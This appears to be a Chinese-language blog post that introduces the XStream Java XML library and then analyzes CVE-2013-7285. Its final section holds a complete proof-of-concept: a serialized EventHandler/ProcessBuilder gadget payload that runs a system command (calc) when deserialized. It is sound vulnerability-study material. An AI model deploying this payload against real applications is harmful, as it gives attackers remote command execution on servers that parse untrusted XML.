介绍
XStream是一个实现javaBean与XML互相转换的工具,极大地简化了开发人员的对XML的处理。
添加依赖
1
2
3
4
5
| <dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream</artifactId>
<version>1.4.6</version>
</dependency>
|
基本使用
序列化
1
2
3
4
5
6
7
8
| public static void main(String[] args) {
XStream xStream = new XStream();
Person person = new Person();
person.setName("l2sec");
person.setAge(10);
String s = xStream.toXML(person);
System.out.println(s);
}
|
反序列化
1
2
3
4
5
6
| String xml = "<com.test.yaml.Person>\n" +
" <name>l2sec</name>\n" +
" <age>10</age>\n" +
"</com.test.yaml.Person>";
Person person = (Person)xStream.fromXML(xml);
System.out.println(person.getAge());
|
漏洞分析
CVE-2013-7285
影响范围
1.4.x<=1.4.6或1.4.10
漏洞介绍
这个编号是XStream的第一个cve编号,经典的EventHandler利用链,它的利用方式是在反序列化解析xml的过程中对绑定EventHandler的动态代理对象调用其绑定接口的方法从而触发到EventHandler的invoke方法,最终触发了命令执行
漏洞POC
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
| package com.test.xstream;
import com.thoughtworks.xstream.XStream;
public class XstreamExploit {
public static void main(String[] args) {
XStream xStream = new XStream();
String xml =
"<sorted-set>\n" +
" <string>foo</string>\n" +
" <dynamic-proxy>\n" +
" <interface>java.lang.Comparable</interface>\n" +
" <handler class=\"java.beans.EventHandler\">\n" +
" <target class=\"java.lang.ProcessBuilder\">\n" +
" <command>\n" +
" <string>cmd</string>\n" +
" <string>/C</string>\n" +
" <string>calc</string>\n" +
" </command>\n" +
" </target>\n" +
" <action>start</action>\n" +
" </handler>\n" +
" </dynamic-proxy>\n" +
"</sorted-set>";
xStream.fromXML(xml);
}
}
|
